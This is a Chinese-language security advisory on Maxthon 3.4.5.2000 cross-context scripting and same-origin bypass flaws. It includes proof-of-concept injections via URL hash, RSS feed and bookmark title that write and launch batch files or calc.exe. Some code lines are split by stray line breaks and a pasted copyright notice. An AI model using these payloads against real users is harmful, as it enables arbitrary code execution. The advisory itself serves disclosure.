发布日期:2012-12-03
更新日期:2012-12-10
受影响系统:
Maxthon Maxthon <= 3.4.5.2000
描述:
--------------------------------------------------------------------------------
BUGTRAQ ID: 56845
Maxthon是一款基于IE内核的、多功能、个性化多标签浏览器。
Maxthon v3.4.5.2000(Windows XP、Windows 7平台)内存在交叉上下文脚本、不正确文件类型处理、SOP绕过安全漏洞,通过组合使用这些漏洞,可以用四种不同的方法达到任意命令执行。
1)恶意用户可通过Maxthon浏览器从不信任网页注入任意JavaScript/HTML代码到Maxthon浏览器特权区域e - mx://res/*。注入点包括:about:history区域、Feed Reader (about:reader)和RSS Viewer,有漏洞的RSS feed元素(<title>、<link>、<description>)、书签工具栏和书签侧栏。
2)浏览器本身可以启动外部工具(计算机、桌面等),这个设计不安全,可允许JS直接调用可执行文件。
3)对about: URI方案使用window.open() 方法可绕过同源策略。此类URI通常映射到特权区域mx://res/*。
<*来源:Roberto Suggi Liverani
链接:
*>
测试方法:
--------------------------------------------------------------------------------
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
通过location.hash属性注入:
#"><img src=https://www.linuxidc.com/Linux/2012-12/a onerror='var b= new
maxthon.io.File.createTempFile("test","bat");c=maxthon.io.File(b);maxthon.io.FileWriter(b);max
thon.io.writeText("cmd /k dir");maxthon.program.Program.launch(b.name_,"C:")'>
传递多个参数到可执行文件:
#"><img src=https://www.linuxidc.com/Linux/2012-12/a onerror='var b= new
maxthon.io.File.createTempFile("test","bat");c=maxthon.io.File(b);maxthon.io.FileWriter(b);max
thon.io.writeText("cmd /k dir");maxthon.program.Program.launch(b.name_,"C:")'>
Maliciouspage.html源代码
<body><script>a = window.location.href='about:history';</script></body>
恶意RSS Feed – 任意代码执行
<?xml version='1.0' encoding="ISO-8859-1"?>
<rss version='2.0'>
<channel>
<description>Malerisch.net</description>
<link></link>
<title>Malerisch.net</title>
<item>
<title>test'><img src=https://www.linuxidc.com/Linux/2012-12/a onerror='var b= new
maxthon.io.File.createTempFile("test","bat");c=maxthon.io.File(b);maxthon.io.FileWriter(b);max
thon.io.writeText("cmd /k dir");maxthon.program.Program.launch(b.name_,"C:")';></title>
<link>javascript:alert(window.location);</link>
<description>07/09/2008 - test <img src=https://www.linuxidc.com/Linux/2012-12/a onerror='var b= new Copyright Security-Assessment.com
maxthon.io.File.createTempFile("test","bat");c=maxthon.io.File(b);maxthon.io.FileWriter(b);max
thon.io.writeText("cmd /k
dir");maxthon.program.Program.launch(b.name_,"C:")';></description>
<pubDate>Sun, 07 Sep 2008 12:00:00 GMT</pubDate>
</item>
</channel>
</rss>
恶意 Add to Favorite 注入 – HTML 源代码
<html>
<head>
<title>Google</title>
<head>
<script>
evilpayload='location.href="file:///C:/windows/system32/calc.exe";'
padding="Google - "
padding2=" "
padding3=" - the best search engine - bookmark now!!!"
window.external.addFavorite("www.google.com",padding+"'><scri"+"pt>"+evilpayload+"</"+"scrip
t>"+" "+" "+padding+padding3)
</script>
</head>
<body>
<h3>Maxthon 3.3.3.1000 - Cross Context Scripting via Bookmark (title parameter) - Code
Execution PoC</h3>
<font size="+1">Roberto Suggi Liverani - <a
href="http://blog.malerisch.net"></a> - <a
href="https://twitter.com/malerisch">@malerisch</a> - <a href="https://www.securityassessment.com">Security-Assessment.com</a></font>
<br>Steps:
<ul>
<li>User is prompted to bookmark an innocuous looking bookmark, like the one shown in
the middle of the screen. The injected payload can only be seen if the user scrolls on the
left of the title element.
<li>User adds the bookmark.
<li>User then clicks on the Star (Favorites) icon or
<li>User clicks on the bookmark link from the bookmark toolbar.
<li>In both cases, calc.exe is executed.
</ul>
The code for the exploit:<br>
<code>
evilpayload='location.href="file:///C:/windows/system32/calc.exe";'
window.external.addFavorite("www.google.com","yourpaddinghere'><scri"+"pt>"+evilpayload+"</"
+"script>andpaddinghere");Copyright Security-Assessment.com
</code>
</body>
</html>
建议:
--------------------------------------------------------------------------------
厂商补丁:
Maxthon
-------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本: